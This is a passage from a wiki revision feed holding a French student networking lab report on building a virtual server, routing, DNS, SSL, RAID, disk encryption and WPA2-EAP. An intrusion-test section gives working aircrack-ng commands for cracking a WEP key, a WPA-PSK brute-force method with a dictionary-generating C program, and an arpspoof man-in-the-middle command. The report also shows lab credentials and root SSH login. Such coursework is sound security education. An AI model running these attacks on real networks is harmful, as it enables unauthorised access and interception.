 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54777</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54777"/>
				<updated>2020-12-16T13:29:15Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation freeRadius */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.100 10.60.114.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.0 10.60.114.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.114.200 10.60.114.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54774</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54774"/>
				<updated>2020-12-16T13:23:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Routage du site IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
